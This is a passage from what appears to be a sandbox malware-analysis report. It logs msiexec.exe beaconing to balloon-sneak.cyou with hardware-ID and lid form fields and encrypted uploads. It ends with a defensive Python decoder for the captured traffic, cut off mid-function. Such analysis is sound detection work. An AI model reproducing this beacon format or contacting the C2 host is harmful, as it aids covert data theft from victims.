server-timing: cfL4;desc="?proto=TCP&rtt=21596&min_rtt=2584&rtt_var=12455&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=951&delivery_rate=1130030&cwnd=183&unsent_bytes=0&cid=ab95039badd2f11f&ts=3055&x=0"
2024-11-29 14:45:58 UTC | 346 | IN | Data Raw: 34 65 33 0d 0a 52 6f 62 38 2f 62 74 4f 77 39 43 47 64 56 69 4c 75 65 32 41 41 58 51 69 47 72 69 70 33 6f 2b 75 2f 76 4a 44 4f 75 4b 44 4c 41 41 39 70 49 72 66 67 58 72 76 38 76 55 51 65 72 48 4e 6e 2f 56 6b 57 41 42 37 33 49 76 6b 36 63 2b 53 67 53 59 57 77 50 56 42 49 6e 7a 67 6e 5a 48 49 4b 2b 2f 79 34 77 31 36 73 65 4b 57 6f 6d 51 61 41 43 43 61 7a 4c 54 74 7a 35 4b 51 49 6c 47 4e 38 30 42 6a 4c 75 71 62 6c 64 34 74 70 37 48 71 47 44 33 75 33 49 7a 71 62 78 31 50 63 74 57 4c 38 71 33 4c 68 4e 42 35 47 4b 2f 6d 57 47 45 4c 35 34 2b 57 6d 54 50 76 71 36 51 51 4e 71 6d 44 7a 2b 46 6b 46 6b 35 38 33 4d 4b 32 35 38 61 61 6b 53 64 51 6b 75 70 4b 61 43 37 6b 6d 4a 54 55 4a 4c 4f 38 34 42 38 32 36 4e 61 4d 6f 69 31 57 52 32 43 61 6b 2f 79 2b 2f 70 2b 42 4d 45
Data Ascii: 4e3Rob8/btOw9CGdViLue2AAXQiGrip3o+u/vJDOuKDLAA9pIrfgXrv8vUQerHNn/VkWAB73Ivk6c+SgSYWwPVBInzgnZHIK+/y4w16seKWomQaACCazLTtz5KQIlGN80BjLuqbld4tp7HqGD3u3Izqbx1PctWL8q3LhNB5GK/mWGEL54+WmTPvq6QQNqmDz+FkFk583MK258aakSdQkupKaC7kmJTUJLO84B826NaMoi1WR2Cak/y+/p+BME
2024-11-29 14:45:58 UTC | 912 | IN | Data Raw: 6e 79 6b 6d 4a 48 59 49 61 47 67 37 42 77 78 37 4d 6d 45 36 32 34 62 51 48 58 51 78 4c 2f 74 79 35 61 61 4c 6c 4b 45 37 45 4e 6b 4a 4f 54 65 30 5a 6b 72 75 66 4b 38 56 78 6e 73 79 34 6a 75 64 56 52 36 4f 4d 57 46 70 61 33 4c 6b 4e 42 35 47 49 6a 6b 54 57 45 76 36 35 32 58 30 6a 36 68 6f 4f 49 61 50 2f 76 64 69 75 78 70 46 56 4a 79 31 4d 32 2f 35 4d 65 56 6c 53 5a 63 77 4b 38 4f 5a 54 79 6b 78 74 2f 34 49 61 71 2b 37 67 41 36 71 63 54 42 2b 79 4d 52 54 44 69 43 69 37 6a 73 79 4a 32 55 4c 31 61 45 37 55 68 73 4b 65 75 59 6c 64 6b 72 71 37 72 73 46 6a 66 69 31 49 2f 6e 62 68 4a 47 64 4e 76 4f 2f 4b 4f 4d 6d 34 68 68 41 4d 44 50 53 57 45 32 70 71 75 63 31 79 4b 6d 70 4b 51 49 64 50 43 62 69 4f 34 6a 54 67 42 32 33 38 53 75 37 4e 36 5a 6e 6a 4e 55 68 65 64 44
Data Ascii: nykmJHYIaGg7Bwx7MmE624bQHXQxL/ty5aaLlKE7ENkJOTe0ZkrufK8Vxnsy4judVR6OMWFpa3LkNB5GIjkTWEv652X0j6hoOIaP/vdiuxpFVJy1M2/5MeVlSZcwK8OZTykxt/4Iaq+7gA6qcTB+yMRTDiCi7jsyJ2UL1aE7UhsKeuYldkrq7rsFjfi1I/nbhJGdNvO/KOMm4hhAMDPSWE2pquc1yKmpKQIdPCbiO4jTgB238Su7N6ZnjNUhedD
2024-11-29 14:45:58 UTC | 1369 | IN | Data Raw: 33 39 66 30 0d 0a 6f 34 39 65 42 38 47 34 63 52 58 62 57 7a 72 50 74 7a 5a 32 65 4b 31 50 41 72 77 35 6c 50 4b 54 47 33 2f 59 68 73 61 44 75 48 43 75 72 37 6f 7a 73 62 52 46 57 4f 4d 57 46 70 61 33 4c 6b 4e 42 35 47 49 76 6e 51 6d 34 6b 34 6f 79 52 31 6a 36 72 6f 4f 41 5a 50 75 58 56 68 75 39 73 45 31 4a 38 32 74 6d 39 36 4d 75 53 6e 54 4e 64 77 4b 38 4f 5a 54 79 6b 78 74 2f 6a 47 4b 61 69 39 52 42 34 33 4e 69 42 37 47 51 41 41 47 65 55 30 76 7a 71 77 4e 7a 49 59 56 75 4d 37 45 64 6e 4b 2f 61 55 6b 39 67 2b 70 72 76 74 48 54 76 6e 31 49 54 75 5a 67 52 4c 64 39 4c 45 76 65 44 42 6c 35 51 68 47 4d 36 68 53 58 70 6b 76 4e 36 2b 31 43 4f 7a 73 66 56 56 44 2b 72 56 67 65 56 31 56 6c 38 32 77 34 75 37 34 59 7a 45 30 43 42 55 6a 4f 42 42 5a 43 37 73 6e 5a 37 4c
Data Ascii: 39f0o49eB8G4cRXbWzrPtzZ2eK1PArw5lPKTG3/YhsaDuHCur7ozsbRFWOMWFpa3LkNB5GIvnQm4k4oyR1j6roOAZPuXVhu9sE1J82tm96MuSnTNdwK8OZTykxt/jGKai9RB43NiB7GQAAGeU0vzqwNzIYVuM7EdnK/aUk9g+prvtHTvn1ITuZgRLd9LEveDBl5QhGM6hSXpkvN6+1COzsfVVD+rVgeV1Vl82w4u74YzE0CBUjOBBZC7snZ7L
2024-11-29 14:45:58 UTC | 1369 | IN | Data Raw: 6b 63 4e 4f 66 53 67 2b 70 76 45 56 4a 31 33 38 4f 32 35 4d 6d 51 6e 53 4a 4b 67 2b 41 4f 4c 47 54 6a 68 74 2b 42 62 49 61 42 30 7a 52 36 39 70 57 57 6f 6d 51 61 41 43 43 61 79 72 54 71 77 70 69 43 4c 30 71 4f 35 6b 35 6b 4c 4f 79 5a 6b 39 63 69 73 37 72 6c 46 7a 54 6d 30 34 62 6d 59 68 4a 45 64 4e 32 4c 38 71 33 4c 68 4e 42 35 47 4b 6a 69 56 48 68 6d 79 70 57 66 33 6a 79 33 71 61 51 49 64 50 43 62 69 4f 34 6a 54 67 42 38 30 63 47 31 37 73 57 59 6e 53 46 52 6a 2b 68 47 62 79 7a 32 6e 35 58 4c 4b 4b 53 7a 36 78 30 2b 34 64 65 41 37 6d 63 45 53 7a 69 55 69 37 76 31 6a 4d 54 51 41 56 4f 57 77 6c 78 77 5a 50 76 51 68 70 6b 72 72 66 4b 38 56 7a 50 6c 32 6f 37 6f 5a 52 31 46 64 64 72 4f 74 75 72 41 6e 4a 41 69 58 6f 62 73 52 6d 6f 6f 36 4a 32 53 33 43 69 7a 6f
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 6b 63 4e 4f 66 53 67 2b 70 76 45 56 4a 31 33 38 4f 32 35 4d 6d 51 6e 53 4a 4b 67 2b 41 4f 4c 47 54 6a 68 74 2b 42 62 49 61 42 30 7a 52 36 39 70 57 57 6f 6d 51 61 41 43 43 61 79 72 54 71 77 70 69 43 4c 30 71 4f 35 6b 35 6b 4c 4f 79 5a 6b 39 63 69 73 37 72 6c 46 7a 54 6d 30 34 62 6d 59 68 4a 45 64 4e 32 4c 38 71 33 4c 68 4e 42 35 47 4b 6a 69 56 48 68 6d 79 70 57 66 33 6a 79 33 71 61 51 49 64 50 43 62 69 4f 34 6a 54 67 42 38 30 63 47 31 37 73 57 59 6e 53 46 52 6a 2b 68 47 62 79 7a 32 6e 35 58 4c 4b 4b 53 7a 36 78 30 2b 34 64 65 41 37 6d 63 45 53 7a 69 55 69 37 76 31 6a 4d 54 51 41 56 4f 57 77 6c 78 77 5a 50 76 51 68 70 6b 72 72 66 4b 38 56 7a 50 6c 32 6f 37 6f 5a 52 31 46 64 64 72 4f 74 75 72 41 6e 4a 41 69 58 6f 62 73 52 6d 6f 6f 36 4a 32 53 33 43 69 7a 6f
                                                                                                                                                                                                          Data Ascii: kcNOfSg+pvEVJ138O25MmQnSJKg+AOLGTjht+BbIaB0zR69pWWomQaACCayrTqwpiCL0qO5k5kLOyZk9cis7rlFzTm04bmYhJEdN2L8q3LhNB5GKjiVHhmypWf3jy3qaQIdPCbiO4jTgB80cG17sWYnSFRj+hGbyz2n5XLKKSz6x0+4deA7mcESziUi7v1jMTQAVOWwlxwZPvQhpkrrfK8VzPl2o7oZR1FddrOturAnJAiXobsRmoo6J2S3Cizo
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 76 31 34 4b 69 4c 56 5a 48 59 4a 71 54 2f 4d 72 57 6b 5a 59 32 53 62 58 6d 54 6a 4e 6b 2b 39 43 47 6d 53 75 74 38 72 78 58 4e 2b 58 52 67 75 64 6e 48 6b 64 37 32 38 65 34 34 4d 47 59 6d 53 56 64 6b 76 4e 49 62 43 54 72 6b 4a 44 56 50 71 2b 33 35 42 74 36 70 35 75 49 2b 69 4e 4f 41 45 6e 4e 79 2f 7a 79 67 6f 58 51 4a 6c 54 41 75 51 35 74 4b 66 61 53 6b 4e 6b 74 6f 72 62 76 45 44 7a 76 32 6f 7a 6e 59 42 4e 47 65 64 72 48 74 75 72 45 6c 70 34 73 58 6f 54 6e 53 43 4a 71 70 4a 6d 48 6d 58 54 68 67 4f 6b 5a 4d 2b 72 64 67 76 52 4c 4a 77 42 6e 6c 4e 4c 38 36 73 44 63 79 47 46 63 69 2b 6c 43 5a 79 7a 68 6e 35 66 54 4a 4b 36 39 39 68 59 31 34 4e 79 45 37 32 77 59 52 58 62 49 7a 4c 66 6d 78 4a 57 65 4a 78 6a 4f 6f 55 6c 36 5a 4c 7a 65 71 64 6f 69 71 71 50 72 46 44
                                                                                                                                                                                                          Data Ascii: v14KiLVZHYJqT/MrWkZY2SbXmTjNk+9CGmSut8rxXN+XRgudnHkd728e44MGYmSVdkvNIbCTrkJDVPq+35Bt6p5uI+iNOAEnNy/zygoXQJlTAuQ5tKfaSkNktorbvEDzv2oznYBNGedrHturElp4sXoTnSCJqpJmHmXThgOkZM+rdgvRLJwBnlNL86sDcyGFci+lCZyzhn5fTJK699hY14NyE72wYRXbIzLfmxJWeJxjOoUl6ZLzeqdoiqqPrFD
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 6f 69 31 57 52 32 43 61 6b 2f 7a 63 32 70 75 58 4c 68 71 70 35 6c 56 6a 4c 75 65 56 6b 35 6b 7a 37 36 75 6b 45 44 61 70 67 38 2f 76 62 78 74 45 61 74 62 4c 76 4f 54 4c 6c 6f 49 75 56 34 33 69 54 6d 63 32 35 59 79 51 30 69 6d 69 74 75 73 59 4e 75 48 52 7a 36 77 6a 45 56 67 34 67 6f 75 51 37 74 32 57 30 67 5a 43 6c 75 5a 43 63 79 2f 70 6b 74 2f 47 59 72 6a 79 34 78 74 36 73 5a 75 50 34 32 34 45 52 58 6e 51 77 62 48 6c 77 35 6d 56 4c 6c 79 45 36 6b 42 77 4b 75 75 65 6d 64 49 74 70 4c 48 76 48 54 54 67 79 63 2b 73 49 78 46 59 4f 49 4b 4c 6c 76 62 4e 6b 5a 78 6a 64 6f 76 33 53 53 41 46 36 70 57 59 31 54 72 68 72 61 6f 4f 65 75 37 58 7a 37 6f 6a 48 30 35 30 32 63 79 30 35 63 6d 63 6d 79 46 58 69 75 39 4a 63 43 37 6f 6c 49 33 57 4c 36 79 32 36 52 30 2f 34 4d 6d
                                                                                                                                                                                                          Data Ascii: oi1WR2Cak/zc2puXLhqp5lVjLueVk5kz76ukEDapg8/vbxtEatbLvOTLloIuV43iTmc25YyQ0imitusYNuHRz6wjEVg4gouQ7t2W0gZCluZCcy/pkt/GYrjy4xt6sZuP424ERXnQwbHlw5mVLlyE6kBwKuuemdItpLHvHTTgyc+sIxFYOIKLlvbNkZxjdov3SSAF6pWY1TrhraoOeu7Xz7ojH0502cy05cmcmyFXiu9JcC7olI3WL6y26R0/4Mm
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 67 42 34 33 73 65 2f 36 73 4b 54 6e 53 35 66 69 2b 35 45 62 44 62 72 6d 35 66 56 4a 4b 79 67 37 68 30 6f 34 4e 4b 43 37 47 73 45 51 7a 69 55 69 37 76 31 6a 4d 54 51 45 31 4b 44 37 56 68 76 4b 36 53 42 30 63 42 73 70 72 36 6b 54 33 72 37 79 59 2f 70 59 78 46 4f 61 74 76 44 73 2b 66 4d 6d 70 73 72 57 34 6e 6c 51 47 73 69 35 5a 4f 65 32 43 79 6b 73 75 30 46 4e 36 6d 56 7a 2b 56 37 56 68 67 34 37 63 65 33 33 4d 2b 4b 30 44 34 57 6d 61 46 4a 62 6d 53 38 33 70 37 4c 49 61 6d 32 35 42 6f 38 34 74 71 4f 34 57 4d 57 51 33 6a 66 77 4c 50 72 79 35 47 61 4b 46 47 53 36 55 70 77 4a 4f 69 61 33 35 64 73 70 71 71 6b 54 33 72 5a 32 49 54 75 59 78 74 56 4f 4d 57 46 70 61 33 4c 6b 4e 42 35 47 49 6a 71 52 57 51 76 35 35 32 52 30 69 61 75 76 65 34 52 50 4f 48 65 6a 2b 35 6a
                                                                                                                                                                                                          Data Ascii: gB43se/6sKTnS5fi+5EbDbrm5fVJKyg7h0o4NKC7GsEQziUi7v1jMTQE1KD7VhvK6SB0cBspr6kT3r7yY/pYxFOatvDs+fMmpsrW4nlQGsi5ZOe2Cyksu0FN6mVz+V7Vhg47ce33M+K0D4WmaFJbmS83p7LIam25Bo84tqO4WMWQ3jfwLPry5GaKFGS6UpwJOia35dspqqkT3rZ2ITuYxtVOMWFpa3LkNB5GIjqRWQv552R0iauve4RPOHej+5j
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 66 62 75 36 32 43 33 4a 5a 68 41 4e 43 76 44 6d 59 31 70 4d 62 50 69 33 66 30 34 62 4e 48 61 50 61 56 6c 71 4a 31 56 68 67 71 6c 49 75 75 72 5a 54 63 31 79 4a 4b 6b 75 64 4e 64 43 65 6a 6f 4b 48 35 4a 36 32 78 36 42 59 39 71 5a 58 50 37 53 4e 4f 65 54 6a 5a 32 61 36 69 33 59 71 64 4d 56 2f 4d 36 56 39 76 4b 4b 54 51 33 35 55 6f 71 72 37 68 45 43 71 6d 79 5a 2f 70 62 77 41 4d 66 4d 69 4c 38 71 33 64 6c 35 38 7a 56 6f 65 75 58 33 51 70 39 4a 32 61 33 6d 43 70 6f 2b 6b 62 65 71 65 62 6d 75 6c 76 45 45 31 74 6c 64 71 71 37 74 71 62 33 43 6c 4a 6a 65 30 4f 58 57 71 6b 68 74 2b 42 62 4a 53 78 36 68 6b 39 2f 38 72 43 77 6d 67 61 51 33 54 62 7a 50 79 6a 6a 4a 72 51 65 51 76 4f 6f 55 70 7a 5a 4c 7a 4f 7a 59 4a 35 38 75 57 30 52 53 57 6e 77 73 2f 30 49 30 34 53 4e
                                                                                                                                                                                                          Data Ascii: fbu62C3JZhANCvDmY1pMbPi3f04bNHaPaVlqJ1VhgqlIuurZTc1yJKkudNdCejoKH5J62x6BY9qZXP7SNOeTjZ2a6i3YqdMV/M6V9vKKTQ35Uoqr7hECqmyZ/pbwAMfMiL8q3dl58zVoeuX3Qp9J2a3mCpo+kbeqebmulvEE1tldqq7tqb3ClJje0OXWqkht+BbJSx6hk9/8rCwmgaQ3TbzPyjjJrQeQvOoUpzZLzOzYJ58uW0RSWnws/0I04SN
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 74 6c 4e 7a 58 4c 31 57 42 34 6b 42 68 4e 76 61 59 6e 4d 38 76 35 6f 7a 61 4d 6a 66 6b 33 6f 48 6c 58 53 68 68 63 73 72 47 73 2b 72 79 6f 71 63 77 58 35 43 6a 61 47 45 79 35 39 37 52 6d 54 54 68 36 71 51 32 4d 50 6e 57 67 4f 55 6a 57 41 42 38 6d 70 50 38 79 4d 47 52 6c 53 39 66 77 73 42 45 63 69 6e 72 6d 64 2b 58 62 4b 33 79 76 46 63 37 34 38 75 43 37 57 52 61 52 32 4c 64 69 2f 4b 74 77 74 7a 49 59 56 6d 4b 38 55 4e 74 49 36 69 59 6b 64 64 73 76 76 7a 39 56 79 79 70 67 39 79 73 49 77 51 41 49 4a 71 4d 73 75 44 4e 6e 35 34 69 53 70 4c 6e 54 58 51 6e 6f 36 43 68 2f 43 47 73 74 2b 6f 51 42 4e 66 36 68 66 4a 75 47 55 63 36 2b 73 79 71 37 76 4b 69 70 7a 42 66 6b 4b 4e 6f 59 54 4c 6e 33 74 47 5a 4e 4f 48 71 70 44 59 77 2b 64 61 41 35 53 45 32 52 32 37 5a 69 2f
                                                                                                                                                                                                          Data Ascii: tlNzXL1WB4kBhNvaYnM8v5ozaMjfk3oHlXShhcsrGs+ryoqcwX5CjaGEy597RmTTh6qQ2MPnWgOUjWAB8mpP8yMGRlS9fwsBEcinrmd+XbK3yvFc748uC7WRaR2Ldi/KtwtzIYVmK8UNtI6iYkddsvvz9Vyypg9ysIwQAIJqMsuDNn54iSpLnTXQno6Ch/CGst+oQBNf6hfJuGUc6+syq7vKipzBfkKNoYTLn3tGZNOHqpDYw+daA5SE2R27Zi/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 172.67.170.85 | 443 | 5544 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:46:00 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=1EO9KR8T3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18111
Host: balloon-sneak.cyou
2024-11-29 14:46:00 UTC | 15331 | OUT | Data Raw: 2d 2d 31 45 4f 39 4b 52 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 31 45 4f 39 4b 52 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 45 4f 39 4b 52 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d 0a 2d 2d 31 45 4f 39 4b 52 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
Data Ascii: --1EO9KR8T3Content-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--1EO9KR8T3Content-Disposition: form-data; name="pid"2--1EO9KR8T3Content-Disposition: form-data; name="lid"MeHdy4--pl8vs07--1EO9KR8T3Content-Di
2024-11-29 14:46:00 UTC | 2780 | OUT | Data Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b
Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
2024-11-29 14:46:02 UTC | 1024 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:46:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=e2r5o2mmg2atmdsch0q53dfeks; expires=Tue, 25-Mar-2025 08:32:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9jXUkw34jGXmUDf56v7dsp6asycntIyO3zyECT%2BXw2PI2RF0cjEdlSru5Sbgkv3RdaB1XR9O3nFZOvEN%2FA42EZy6wXZc490lSykfbFQkZfITd%2FfQO3to%2BRgcX6DTSiJYoywtYTg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea3627d089d42b2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=12289&min_rtt=12219&rtt_var=4723&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19066&delivery_rate=228446&cwnd=236&unsent_bytes=0&cid=2b58c98f4bfd421c&ts=2554&x=0"
2024-11-29 14:46:02 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii: fok 8.46.123.228
2024-11-29 14:46:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49747 | 172.67.170.85 | 443 | 5544 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:46:04 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=38KS5A4HANM6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8750
Host: balloon-sneak.cyou
2024-11-29 14:46:04 UTC | 8750 | OUT | Data Raw: 2d 2d 33 38 4b 53 35 41 34 48 41 4e 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 33 38 4b 53 35 41 34 48 41 4e 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 38 4b 53 35 41 34 48 41 4e 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d 0a 2d 2d 33 38 4b 53 35 41 34 48 41 4e 4d 36
Data Ascii: --38KS5A4HANM6Content-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--38KS5A4HANM6Content-Disposition: form-data; name="pid"2--38KS5A4HANM6Content-Disposition: form-data; name="lid"MeHdy4--pl8vs07--38KS5A4HANM6
2024-11-29 14:46:07 UTC | 1027 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:46:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mu0i433gnlhis203abt4g32jtp; expires=Tue, 25-Mar-2025 08:32:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Q9q44lgD1Lslx%2FMmwAju3q%2BpfB47g3zsYViR6FX%2FQcA4DGbYMAdPG3c94%2BVvHR33HccWVP1ZuohlmJm9a0AvxFJIspPSR%2ByQ4f9WAbgrESch9MB8awYuDkLDoGwHOn0Mkrj%2F2A%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea362973ee71821-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=85826&min_rtt=1502&rtt_var=50418&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9685&delivery_rate=1944074&cwnd=242&unsent_bytes=0&cid=3b85b6717fe1976d&ts=2573&x=0"
2024-11-29 14:46:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii: fok 8.46.123.228
2024-11-29 14:46:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
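The sessions above are one exchange repeated: msiexec.exe POSTs a multipart form carrying hwid, pid and lid fields to /api on balloon-sneak.cyou, and the server answers with a two-chunk body reading "ok " followed by an IP address. The Python below is an added illustration for this report, not Joe Sandbox code and not code recovered from the sample. It splits the multipart body on the full "--<boundary>" delimiter (the captured lid value, MeHdy4--pl8vs07, itself contains "--", so a naive split on "--" would corrupt it), de-chunks the reply, and returns the fields a network detection could key on. The sample bytes are constructed from the report's own hex and ASCII dumps of session 2; the encrypted fourth form part is omitted and the closing boundary is assumed.

```python
"""
Decode the beacon captured above: a multipart/form-data POST to /api and the
chunked "ok <ip>" reply. Added example for this report; not Joe Sandbox code
and not code from the sample. The sample bytes are constructed from the
report's hex/ASCII dumps (session 2): the encrypted fourth form part is
omitted and the closing boundary is assumed.
"""
import re
from typing import Optional

# Constructed request: headers and the three plaintext form parts seen in the
# capture (Content-Length omitted because the encrypted part is not reproduced).
REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: multipart/form-data; boundary=1EO9KR8T3\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Host: balloon-sneak.cyou\r\n"
    b"\r\n"
    b"--1EO9KR8T3\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"36A53A0ACE1B87A3169428F99DFB47D9\r\n"
    b"--1EO9KR8T3\r\n"
    b'Content-Disposition: form-data; name="pid"\r\n\r\n'
    b"2\r\n"
    b"--1EO9KR8T3\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n'
    b"MeHdy4--pl8vs07\r\n"
    b"--1EO9KR8T3--\r\n"  # assumed closing delimiter; not in the truncated dump
)

# Constructed reply: the two chunks shown in the capture, "f\r\nok 8.46.123.228\r\n"
# and the terminating "0\r\n\r\n" (hex copied from the Data Raw lines).
RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    + bytes.fromhex("66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a")
    + bytes.fromhex("30 0d 0a 0d 0a")
)


def split_http(raw: bytes):
    """Split a raw HTTP/1.x message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return lines[0].decode(errors="replace"), headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Map form-field name -> raw bytes. Splits on the full "--<boundary>" delimiter,
    so a value that merely contains "--" (the captured lid does) survives intact."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # "--<boundary>--": closing delimiter
            break
        part = part.lstrip(b"\r\n")
        part_headers, _, data = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', part_headers)
        if m:
            # Part data is followed by the CRLF that precedes the next delimiter.
            fields[m.group(1).decode()] = data[:-2] if data.endswith(b"\r\n") else data
    return fields


def decode_chunked(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
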